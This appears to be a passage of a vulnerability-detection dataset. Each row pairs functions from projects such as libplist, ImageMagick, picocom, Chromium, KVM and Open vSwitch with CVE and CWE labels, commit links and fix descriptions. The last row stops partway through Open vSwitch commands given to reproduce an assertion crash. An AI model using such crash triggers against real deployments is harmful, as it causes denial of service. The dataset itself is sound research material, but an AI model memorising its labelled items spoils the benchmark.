} else if ((c0 >= 0xE0) && (i < size-2) && (c1 >= 0x80) && (c2 >= 0x80)) {
outbuf[p++] = ((c2 & 0x3F) + ((c1 & 3) << 6)) + (((c1 >> 2) & 15) << 8) + ((c0 & 15) << 12);
i+=3;
} else if ((c0 >= 0xC0) && (i < size-1) && (c1 >= 0x80)) {
outbuf[p++] = ((c1 & 0x3F) + ((c0 & 3) << 6)) + (((c0 >> 2) & 7) << 8);
i+=2;
} else if (c0 < 0x80) {
outbuf[p++] = c0;
i+=1;
} else {
PLIST_BIN_ERR("%s: invalid utf8 sequence in string at index %lu\n", __func__, i);
break;
}
}
if (items_read) {
*items_read = i;
}
if (items_written) {
*items_written = p;
}
outbuf[p] = 0;
return outbuf;
}
|
static uint16_t *plist_utf8_to_utf16(char *unistr, long size, long *items_read, long *items_written)
{
uint16_t *outbuf = (uint16_t*)malloc(((size*2)+1)*sizeof(uint16_t));
int p = 0;
long i = 0;
unsigned char c0;
unsigned char c1;
unsigned char c2;
unsigned char c3;
uint32_t w;
while (i < size) {
c0 = unistr[i];
c1 = (i < size-1) ? unistr[i+1] : 0;
c2 = (i < size-2) ? unistr[i+2] : 0;
c3 = (i < size-3) ? unistr[i+3] : 0;
if ((c0 >= 0xF0) && (i < size-3) && (c1 >= 0x80) && (c2 >= 0x80) && (c3 >= 0x80)) {
w = ((((c0 & 7) << 18) + ((c1 & 0x3F) << 12) + ((c2 & 0x3F) << 6) + (c3 & 0x3F)) & 0x1FFFFF) - 0x010000;
outbuf[p++] = 0xD800 + (w >> 10);
outbuf[p++] = 0xDC00 + (w & 0x3FF);
i+=4;
} else if ((c0 >= 0xE0) && (i < size-2) && (c1 >= 0x80) && (c2 >= 0x80)) {
outbuf[p++] = ((c2 & 0x3F) + ((c1 & 3) << 6)) + (((c1 >> 2) & 15) << 8) + ((c0 & 15) << 12);
i+=3;
} else if ((c0 >= 0xC0) && (i < size-1) && (c1 >= 0x80)) {
outbuf[p++] = ((c1 & 0x3F) + ((c0 & 3) << 6)) + (((c0 >> 2) & 7) << 8);
i+=2;
} else if (c0 < 0x80) {
outbuf[p++] = c0;
i+=1;
} else {
PLIST_BIN_ERR("%s: invalid utf8 sequence in string at index %lu\n", __func__, i);
break;
}
}
if (items_read) {
*items_read = i;
}
if (items_written) {
*items_written = p;
}
outbuf[p] = 0;
return outbuf;
}
|
C
|
libplist
| 0 |
CVE-2016-5688
|
https://www.cvedetails.com/cve/CVE-2016-5688/
|
CWE-119
|
https://github.com/ImageMagick/ImageMagick/commit/aecd0ada163a4d6c769cec178955d5f3e9316f2f
|
aecd0ada163a4d6c769cec178955d5f3e9316f2f
|
Set pixel cache to undefined if any resource limit is exceeded
|
static MagickBooleanType ClonePixelCacheRepository(
CacheInfo *magick_restrict clone_info,CacheInfo *magick_restrict cache_info,
ExceptionInfo *exception)
{
#define MaxCacheThreads 2
#define cache_threads(source,destination) \
num_threads(((source)->type == DiskCache) || \
((destination)->type == DiskCache) || (((source)->rows) < \
(16*GetMagickResourceLimit(ThreadResource))) ? 1 : \
GetMagickResourceLimit(ThreadResource) < MaxCacheThreads ? \
GetMagickResourceLimit(ThreadResource) : MaxCacheThreads)
MagickBooleanType
optimize,
status;
NexusInfo
**magick_restrict cache_nexus,
**magick_restrict clone_nexus;
size_t
length;
ssize_t
y;
assert(cache_info != (CacheInfo *) NULL);
assert(clone_info != (CacheInfo *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (cache_info->type == PingCache)
return(MagickTrue);
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
if ((cache_info->columns == clone_info->columns) &&
(cache_info->rows == clone_info->rows) &&
(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) &&
(cache_info->metacontent_extent == clone_info->metacontent_extent))
{
/*
Identical pixel cache morphology.
*/
if (((cache_info->type == MemoryCache) ||
(cache_info->type == MapCache)) &&
((clone_info->type == MemoryCache) ||
(clone_info->type == MapCache)))
{
(void) memcpy(clone_info->pixels,cache_info->pixels,
cache_info->columns*cache_info->number_channels*cache_info->rows*
sizeof(*cache_info->pixels));
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
(void) memcpy(clone_info->metacontent,cache_info->metacontent,
cache_info->columns*cache_info->rows*
clone_info->metacontent_extent*sizeof(unsigned char));
return(MagickTrue);
}
if ((cache_info->type == DiskCache) && (clone_info->type == DiskCache))
return(ClonePixelCacheOnDisk(cache_info,clone_info));
}
/*
Mismatched pixel cache morphology.
*/
cache_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
clone_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
if ((cache_nexus == (NexusInfo **) NULL) ||
(clone_nexus == (NexusInfo **) NULL))
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
optimize=(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) ?
MagickTrue : MagickFalse;
length=(size_t) MagickMin(cache_info->columns*cache_info->number_channels,
clone_info->columns*clone_info->number_channels);
status=MagickTrue;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
register ssize_t
x;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,&region,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCachePixels(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,&region,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
(void) ResetMagickMemory(clone_nexus[id]->pixels,0,(size_t)
clone_nexus[id]->length);
if (optimize != MagickFalse)
(void) memcpy(clone_nexus[id]->pixels,cache_nexus[id]->pixels,length*
sizeof(Quantum));
else
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
/*
Mismatched pixel channel map.
*/
p=cache_nexus[id]->pixels;
q=clone_nexus[id]->pixels;
for (x=0; x < (ssize_t) cache_info->columns; x++)
{
register ssize_t
i;
if (x == (ssize_t) clone_info->columns)
break;
for (i=0; i < (ssize_t) clone_info->number_channels; i++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=clone_info->channel_map[i].channel;
traits=cache_info->channel_map[channel].traits;
if (traits != UndefinedPixelTrait)
*q=*(p+cache_info->channel_map[channel].offset);
q++;
}
p+=cache_info->number_channels;
}
}
status=WritePixelCachePixels(clone_info,clone_nexus[id],exception);
}
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
{
/*
Clone metacontent.
*/
length=(size_t) MagickMin(cache_info->metacontent_extent,
clone_info->metacontent_extent);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,&region,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCacheMetacontent(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,&region,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
if ((clone_nexus[id]->metacontent != (void *) NULL) &&
(cache_nexus[id]->metacontent != (void *) NULL))
(void) memcpy(clone_nexus[id]->metacontent,
cache_nexus[id]->metacontent,length*sizeof(unsigned char));
status=WritePixelCacheMetacontent(clone_info,clone_nexus[id],exception);
}
}
cache_nexus=DestroyPixelCacheNexus(cache_nexus,MaxCacheThreads);
clone_nexus=DestroyPixelCacheNexus(clone_nexus,MaxCacheThreads);
if (cache_info->debug != MagickFalse)
{
char
message[MagickPathExtent];
(void) FormatLocaleString(message,MagickPathExtent,"%s => %s",
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) cache_info->type),
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) clone_info->type));
(void) LogMagickEvent(CacheEvent,GetMagickModule(),"%s",message);
}
return(status);
}
|
static MagickBooleanType ClonePixelCacheRepository(
CacheInfo *magick_restrict clone_info,CacheInfo *magick_restrict cache_info,
ExceptionInfo *exception)
{
#define MaxCacheThreads 2
#define cache_threads(source,destination) \
num_threads(((source)->type == DiskCache) || \
((destination)->type == DiskCache) || (((source)->rows) < \
(16*GetMagickResourceLimit(ThreadResource))) ? 1 : \
GetMagickResourceLimit(ThreadResource) < MaxCacheThreads ? \
GetMagickResourceLimit(ThreadResource) : MaxCacheThreads)
MagickBooleanType
optimize,
status;
NexusInfo
**magick_restrict cache_nexus,
**magick_restrict clone_nexus;
size_t
length;
ssize_t
y;
assert(cache_info != (CacheInfo *) NULL);
assert(clone_info != (CacheInfo *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (cache_info->type == PingCache)
return(MagickTrue);
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
if ((cache_info->columns == clone_info->columns) &&
(cache_info->rows == clone_info->rows) &&
(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) &&
(cache_info->metacontent_extent == clone_info->metacontent_extent))
{
/*
Identical pixel cache morphology.
*/
if (((cache_info->type == MemoryCache) ||
(cache_info->type == MapCache)) &&
((clone_info->type == MemoryCache) ||
(clone_info->type == MapCache)))
{
(void) memcpy(clone_info->pixels,cache_info->pixels,
cache_info->columns*cache_info->number_channels*cache_info->rows*
sizeof(*cache_info->pixels));
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
(void) memcpy(clone_info->metacontent,cache_info->metacontent,
cache_info->columns*cache_info->rows*
clone_info->metacontent_extent*sizeof(unsigned char));
return(MagickTrue);
}
if ((cache_info->type == DiskCache) && (clone_info->type == DiskCache))
return(ClonePixelCacheOnDisk(cache_info,clone_info));
}
/*
Mismatched pixel cache morphology.
*/
cache_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
clone_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
if ((cache_nexus == (NexusInfo **) NULL) ||
(clone_nexus == (NexusInfo **) NULL))
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
optimize=(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) ?
MagickTrue : MagickFalse;
length=(size_t) MagickMin(cache_info->columns*cache_info->number_channels,
clone_info->columns*clone_info->number_channels);
status=MagickTrue;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
register ssize_t
x;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,&region,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCachePixels(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,&region,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
(void) ResetMagickMemory(clone_nexus[id]->pixels,0,(size_t)
clone_nexus[id]->length);
if (optimize != MagickFalse)
(void) memcpy(clone_nexus[id]->pixels,cache_nexus[id]->pixels,length*
sizeof(Quantum));
else
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
/*
Mismatched pixel channel map.
*/
p=cache_nexus[id]->pixels;
q=clone_nexus[id]->pixels;
for (x=0; x < (ssize_t) cache_info->columns; x++)
{
register ssize_t
i;
if (x == (ssize_t) clone_info->columns)
break;
for (i=0; i < (ssize_t) clone_info->number_channels; i++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=clone_info->channel_map[i].channel;
traits=cache_info->channel_map[channel].traits;
if (traits != UndefinedPixelTrait)
*q=*(p+cache_info->channel_map[channel].offset);
q++;
}
p+=cache_info->number_channels;
}
}
status=WritePixelCachePixels(clone_info,clone_nexus[id],exception);
}
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
{
/*
Clone metacontent.
*/
length=(size_t) MagickMin(cache_info->metacontent_extent,
clone_info->metacontent_extent);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,&region,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCacheMetacontent(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,&region,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
if ((clone_nexus[id]->metacontent != (void *) NULL) &&
(cache_nexus[id]->metacontent != (void *) NULL))
(void) memcpy(clone_nexus[id]->metacontent,
cache_nexus[id]->metacontent,length*sizeof(unsigned char));
status=WritePixelCacheMetacontent(clone_info,clone_nexus[id],exception);
}
}
cache_nexus=DestroyPixelCacheNexus(cache_nexus,MaxCacheThreads);
clone_nexus=DestroyPixelCacheNexus(clone_nexus,MaxCacheThreads);
if (cache_info->debug != MagickFalse)
{
char
message[MagickPathExtent];
(void) FormatLocaleString(message,MagickPathExtent,"%s => %s",
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) cache_info->type),
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) clone_info->type));
(void) LogMagickEvent(CacheEvent,GetMagickModule(),"%s",message);
}
return(status);
}
|
C
|
ImageMagick
| 0 |
CVE-2015-9059
|
https://www.cvedetails.com/cve/CVE-2015-9059/
|
CWE-77
|
https://github.com/npat-efault/picocom/commit/1ebc60b20fbe9a02436d5cbbf8951714e749ddb1
|
1ebc60b20fbe9a02436d5cbbf8951714e749ddb1
|
Do not use "/bin/sh" to run external commands.
Picocom no longer uses /bin/sh to run external commands for
file-transfer operations. Parsing the command line and splitting it into
arguments is now performed internally by picocom, using quoting rules
very similar to those of the Unix shell. Hopefully, this makes it
impossible to inject shell commands when supplying filenames or
extra arguments to the send- and receive-file commands.
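A rough sketch of the safer pattern, under the assumption of whitespace-only splitting (picocom's real parser also handles quoting): build an argv yourself and exec the program directly, so no shell ever interprets metacharacters in filenames. Note that strtok() modifies the command line in place, so the caller must pass a writable copy.
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MAX_ARGS 32

static int run_command(char *cmdline)
{
    char *argv[MAX_ARGS + 1];
    int argc = 0;
    pid_t pid;
    int status;

    /* Naive whitespace split; no shell is ever involved. */
    for (char *tok = strtok(cmdline, " \t"); tok && argc < MAX_ARGS;
         tok = strtok(NULL, " \t"))
        argv[argc++] = tok;
    argv[argc] = NULL;
    if (argc == 0)
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);   /* direct exec, no /bin/sh -c */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}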
|
main(int argc, char *argv[])
{
int r;
parse_args(argc, argv);
establish_signal_handlers();
r = term_lib_init();
if ( r < 0 )
fatal("term_init failed: %s", term_strerror(term_errno, errno));
#ifdef UUCP_LOCK_DIR
if ( ! opts.nolock ) uucp_lockname(UUCP_LOCK_DIR, opts.port);
if ( uucp_lock() < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
#endif
tty_fd = open(opts.port, O_RDWR | O_NONBLOCK | O_NOCTTY);
if (tty_fd < 0)
fatal("cannot open %s: %s", opts.port, strerror(errno));
#ifdef USE_FLOCK
if ( ! opts.nolock ) {
r = flock(tty_fd, LOCK_EX | LOCK_NB);
if ( r < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
}
#endif
if ( opts.noinit ) {
r = term_add(tty_fd);
} else {
r = term_set(tty_fd,
1, /* raw mode. */
opts.baud, /* baud rate. */
opts.parity, /* parity. */
opts.databits, /* data bits. */
opts.flow, /* flow control. */
1, /* local or modem */
!opts.noreset); /* hup-on-close. */
}
if ( r < 0 )
fatal("failed to add device %s: %s",
opts.port, term_strerror(term_errno, errno));
r = term_apply(tty_fd);
if ( r < 0 )
fatal("failed to config device %s: %s",
opts.port, term_strerror(term_errno, errno));
set_tty_write_sz(term_get_baudrate(tty_fd, NULL));
r = term_add(STI);
if ( r < 0 )
fatal("failed to add I/O device: %s",
term_strerror(term_errno, errno));
term_set_raw(STI);
r = term_apply(STI);
if ( r < 0 )
fatal("failed to set I/O device to raw mode: %s",
term_strerror(term_errno, errno));
#ifdef LINENOISE
init_send_receive_history();
#endif
fd_printf(STO, "Terminal ready\r\n");
loop();
#ifdef LINENOISE
cleanup_send_receive_history();
#endif
fd_printf(STO, "\r\n");
if ( opts.noreset ) {
fd_printf(STO, "Skipping tty reset...\r\n");
term_erase(tty_fd);
}
if ( sig_exit )
fd_printf(STO, "Picocom was killed\r\n");
else
fd_printf(STO, "Thanks for using picocom\r\n");
/* wait a bit for output to drain */
sleep(1);
#ifdef UUCP_LOCK_DIR
uucp_unlock();
#endif
return EXIT_SUCCESS;
}
|
main(int argc, char *argv[])
{
int r;
parse_args(argc, argv);
establish_signal_handlers();
r = term_lib_init();
if ( r < 0 )
fatal("term_init failed: %s", term_strerror(term_errno, errno));
#ifdef UUCP_LOCK_DIR
if ( ! opts.nolock ) uucp_lockname(UUCP_LOCK_DIR, opts.port);
if ( uucp_lock() < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
#endif
tty_fd = open(opts.port, O_RDWR | O_NONBLOCK | O_NOCTTY);
if (tty_fd < 0)
fatal("cannot open %s: %s", opts.port, strerror(errno));
#ifdef USE_FLOCK
if ( ! opts.nolock ) {
r = flock(tty_fd, LOCK_EX | LOCK_NB);
if ( r < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
}
#endif
if ( opts.noinit ) {
r = term_add(tty_fd);
} else {
r = term_set(tty_fd,
1, /* raw mode. */
opts.baud, /* baud rate. */
opts.parity, /* parity. */
opts.databits, /* data bits. */
opts.flow, /* flow control. */
1, /* local or modem */
!opts.noreset); /* hup-on-close. */
}
if ( r < 0 )
fatal("failed to add device %s: %s",
opts.port, term_strerror(term_errno, errno));
r = term_apply(tty_fd);
if ( r < 0 )
fatal("failed to config device %s: %s",
opts.port, term_strerror(term_errno, errno));
set_tty_write_sz(term_get_baudrate(tty_fd, NULL));
r = term_add(STI);
if ( r < 0 )
fatal("failed to add I/O device: %s",
term_strerror(term_errno, errno));
term_set_raw(STI);
r = term_apply(STI);
if ( r < 0 )
fatal("failed to set I/O device to raw mode: %s",
term_strerror(term_errno, errno));
#ifdef LINENOISE
init_send_receive_history();
#endif
fd_printf(STO, "Terminal ready\r\n");
loop();
#ifdef LINENOISE
cleanup_send_receive_history();
#endif
fd_printf(STO, "\r\n");
if ( opts.noreset ) {
fd_printf(STO, "Skipping tty reset...\r\n");
term_erase(tty_fd);
}
if ( sig_exit )
fd_printf(STO, "Picocom was killed\r\n");
else
fd_printf(STO, "Thanks for using picocom\r\n");
/* wait a bit for output to drain */
sleep(1);
#ifdef UUCP_LOCK_DIR
uucp_unlock();
#endif
return EXIT_SUCCESS;
}
|
C
|
picocom
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/59f5e0204cbc0e524b2687fb1beddda82047d16d
|
59f5e0204cbc0e524b2687fb1beddda82047d16d
|
AutoFill: Record whether the user initiated the form submission and don't save form data if the form was not user-submitted.
BUG=48225
TEST=none
Review URL: http://codereview.chromium.org/2842062
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@53350 0039d316-1c4b-4281-b951-d872f2087c98
|
AutoFillManager::AutoFillManager(TabContents* tab_contents,
PersonalDataManager* personal_data)
: tab_contents_(tab_contents),
personal_data_(personal_data),
download_manager_(NULL) {
DCHECK(tab_contents);
}
|
AutoFillManager::AutoFillManager(TabContents* tab_contents,
PersonalDataManager* personal_data)
: tab_contents_(tab_contents),
personal_data_(personal_data),
download_manager_(NULL) {
DCHECK(tab_contents);
}
|
C
|
Chrome
| 0 |
CVE-2012-1601
|
https://www.cvedetails.com/cve/CVE-2012-1601/
|
CWE-399
|
https://github.com/torvalds/linux/commit/9c895160d25a76c21b65bad141b08e8d4f99afef
|
9c895160d25a76c21b65bad141b08e8d4f99afef
|
KVM: Ensure all vcpus are consistent with in-kernel irqchip settings
(cherry picked from commit 3e515705a1f46beb1c942bb8043c16f8ac7b1e9e)
If some vcpus are created before KVM_CREATE_IRQCHIP, then
irqchip_in_kernel() and vcpu->arch.apic will be inconsistent, leading
to potential NULL pointer dereferences.
Fix by:
- ensuring that no vcpus are installed when KVM_CREATE_IRQCHIP is called
- ensuring that a vcpu has an apic if it is installed after KVM_CREATE_IRQCHIP
This is somewhat long winded because vcpu->arch.apic is created without
kvm->lock held.
Based on earlier patch by Michael Ellerman.
Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Avi Kivity <avi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
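The two invariants in the fix can be modelled with toy structures (names and return values are illustrative, not KVM's): creating the in-kernel irqchip is refused once any vcpu exists, and a vcpu created afterwards must come with an APIC.
#include <stddef.h>

struct toy_vcpu { void *apic; };

struct toy_vm {
    int irqchip_in_kernel;
    int online_vcpus;
};

/* Creating the in-kernel irqchip is only allowed while no vcpus exist. */
static int vm_create_irqchip(struct toy_vm *vm)
{
    if (vm->online_vcpus > 0)
        return -1;               /* -EINVAL in the kernel */
    vm->irqchip_in_kernel = 1;
    return 0;
}

/* A vcpu created after the irqchip exists must have a local APIC. */
static int vm_add_vcpu(struct toy_vm *vm, struct toy_vcpu *vcpu)
{
    if (vm->irqchip_in_kernel && vcpu->apic == NULL)
        return -1;
    vm->online_vcpus++;
    return 0;
}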
|
static void kvm_set_mmio_spte_mask(void)
{
u64 mask;
int maxphyaddr = boot_cpu_data.x86_phys_bits;
/*
* Set the reserved bits and the present bit of an paging-structure
* entry to generate page fault with PFER.RSV = 1.
*/
mask = ((1ull << (62 - maxphyaddr + 1)) - 1) << maxphyaddr;
mask |= 1ull;
#ifdef CONFIG_X86_64
/*
* If reserved bit is not supported, clear the present bit to disable
* mmio page fault.
*/
if (maxphyaddr == 52)
mask &= ~1ull;
#endif
kvm_mmu_set_mmio_spte_mask(mask);
}
|
static void kvm_set_mmio_spte_mask(void)
{
u64 mask;
int maxphyaddr = boot_cpu_data.x86_phys_bits;
/*
* Set the reserved bits and the present bit of an paging-structure
* entry to generate page fault with PFER.RSV = 1.
*/
mask = ((1ull << (62 - maxphyaddr + 1)) - 1) << maxphyaddr;
mask |= 1ull;
#ifdef CONFIG_X86_64
/*
* If reserved bit is not supported, clear the present bit to disable
* mmio page fault.
*/
if (maxphyaddr == 52)
mask &= ~1ull;
#endif
kvm_mmu_set_mmio_spte_mask(mask);
}
|
C
|
linux
| 0 |
CVE-2016-3861
|
https://www.cvedetails.com/cve/CVE-2016-3861/
|
CWE-119
|
https://android.googlesource.com/platform/frameworks/native/+/1f4b49e64adf4623eefda503bca61e253597b9bf
|
1f4b49e64adf4623eefda503bca61e253597b9bf
|
Add bound checks to utf16_to_utf8
Bug: 29250543
Change-Id: I518e7b2fe10aaa3f1c1987586a09b1110aff7e1a
(cherry picked from commit 7e93b2ddcb49b5365fbe1dab134ffb38e6f1c719)
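Sketch of a bounds-checked conversion loop, restricted to the ASCII subset so it stays short; every write is validated against the destination size before it happens. This is only the shape of the fix, not the Android utf16_to_utf8 implementation.
#include <stddef.h>
#include <stdint.h>
#include <sys/types.h>

/* Convert 'len' UTF-16 code units into 'dst' (dst_size bytes, including the
 * terminating NUL). Only the ASCII subset is handled in this sketch; returns
 * the number of bytes written (excluding the NUL) or -1 on overflow. */
static ssize_t utf16_to_utf8_ascii(const uint16_t *src, size_t len,
                                   char *dst, size_t dst_size)
{
    size_t out = 0;

    if (dst_size == 0)
        return -1;
    for (size_t i = 0; i < len; i++) {
        if (src[i] > 0x7F)
            return -1;                 /* non-ASCII is out of scope here */
        if (out + 1 >= dst_size)       /* bound check before every write */
            return -1;
        dst[out++] = (char)src[i];
    }
    dst[out] = '\0';
    return (ssize_t)out;
}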
|
status_t Parcel::writeStrongBinderVector(const std::vector<sp<IBinder>>& val)
{
return writeTypedVector(val, &Parcel::writeStrongBinder);
}
|
status_t Parcel::writeStrongBinderVector(const std::vector<sp<IBinder>>& val)
{
return writeTypedVector(val, &Parcel::writeStrongBinder);
}
|
C
|
Android
| 0 |
CVE-2017-5008
|
https://www.cvedetails.com/cve/CVE-2017-5008/
|
CWE-79
|
https://github.com/chromium/chromium/commit/c093b7a74ddce32dd3b0e0be60f31becc6ce32f9
|
c093b7a74ddce32dd3b0e0be60f31becc6ce32f9
|
Don't touch the prototype chain to get the private script controller.
Prior to this patch, private scripts attempted to get the
"privateScriptController" property off the global object without verifying if
the property actually exists on the global. If the property hasn't been set yet,
this operation could descend into the prototype chain and potentially return
a named property from the WindowProperties object, leading to release asserts
and general confusion.
BUG=668552
Review-Url: https://codereview.chromium.org/2529163002
Cr-Commit-Position: refs/heads/master@{#434627}
|
v8::Local<v8::Value> PrivateScriptRunner::runDOMMethod(
ScriptState* scriptState,
ScriptState* scriptStateInUserScript,
const char* className,
const char* methodName,
v8::Local<v8::Value> holder,
int argc,
v8::Local<v8::Value> argv[]) {
v8::Local<v8::Object> classObject =
classObjectOfPrivateScript(scriptState, className);
v8::Local<v8::Value> method;
if (!classObject
->Get(scriptState->context(),
v8String(scriptState->isolate(), methodName))
.ToLocal(&method) ||
!method->IsFunction()) {
LOG(FATAL)
<< "Private script error: Target DOM method was not found. (Class "
"name = "
<< className << ", Method name = " << methodName << ")";
}
initializeHolderIfNeeded(scriptState, classObject, holder);
v8::TryCatch block(scriptState->isolate());
v8::Local<v8::Value> result;
if (!V8ScriptRunner::callInternalFunction(
v8::Local<v8::Function>::Cast(method), holder, argc, argv,
scriptState->isolate())
.ToLocal(&result)) {
rethrowExceptionInPrivateScript(
scriptState->isolate(), block, scriptStateInUserScript,
ExceptionState::ExecutionContext, methodName, className);
block.ReThrow();
return v8::Local<v8::Value>();
}
return result;
}
|
v8::Local<v8::Value> PrivateScriptRunner::runDOMMethod(
ScriptState* scriptState,
ScriptState* scriptStateInUserScript,
const char* className,
const char* methodName,
v8::Local<v8::Value> holder,
int argc,
v8::Local<v8::Value> argv[]) {
v8::Local<v8::Object> classObject =
classObjectOfPrivateScript(scriptState, className);
v8::Local<v8::Value> method;
if (!classObject
->Get(scriptState->context(),
v8String(scriptState->isolate(), methodName))
.ToLocal(&method) ||
!method->IsFunction()) {
LOG(FATAL)
<< "Private script error: Target DOM method was not found. (Class "
"name = "
<< className << ", Method name = " << methodName << ")";
}
initializeHolderIfNeeded(scriptState, classObject, holder);
v8::TryCatch block(scriptState->isolate());
v8::Local<v8::Value> result;
if (!V8ScriptRunner::callInternalFunction(
v8::Local<v8::Function>::Cast(method), holder, argc, argv,
scriptState->isolate())
.ToLocal(&result)) {
rethrowExceptionInPrivateScript(
scriptState->isolate(), block, scriptStateInUserScript,
ExceptionState::ExecutionContext, methodName, className);
block.ReThrow();
return v8::Local<v8::Value>();
}
return result;
}
|
C
|
Chrome
| 0 |
CVE-2018-17205
|
https://www.cvedetails.com/cve/CVE-2018-17205/
|
CWE-617
|
https://github.com/openvswitch/ovs/commit/0befd1f3745055c32940f5faf9559be6a14395e6
|
0befd1f3745055c32940f5faf9559be6a14395e6
|
ofproto: Fix OVS crash when reverting old flows in bundle commit
During a bundle commit, the flows added in the bundle are applied
to ofproto in order. If a flow cannot be added (e.g. its
action is a go-to-group whose group id does not exist), OVS tries to
revert all previous flows that were successfully applied
from the same bundle. This is possible because OVS maintains a list
of the old flows that were replaced by flows from the bundle.
While reinserting the old flows, OVS asserts due to a check that the rule
state != RULE_INITIALIZED. That check holds only for new flows; for
an old flow the rule state will be RULE_REMOVED, so the assert fires
and OVS crashes.
The assert check should be changed to != RULE_INSERTED, so that any
already-inserted rule is still rejected while both new rules and old rules
(in the revert case) can be inserted.
Here is an example to trigger the assert:
$ ovs-vsctl add-br br-test -- set Bridge br-test datapath_type=netdev
$ cat flows.txt
flow add table=1,priority=0,in_port=2,actions=NORMAL
flow add table=1,priority=0,in_port=3,actions=NORMAL
$ ovs-ofctl dump-flows -OOpenflow13 br-test
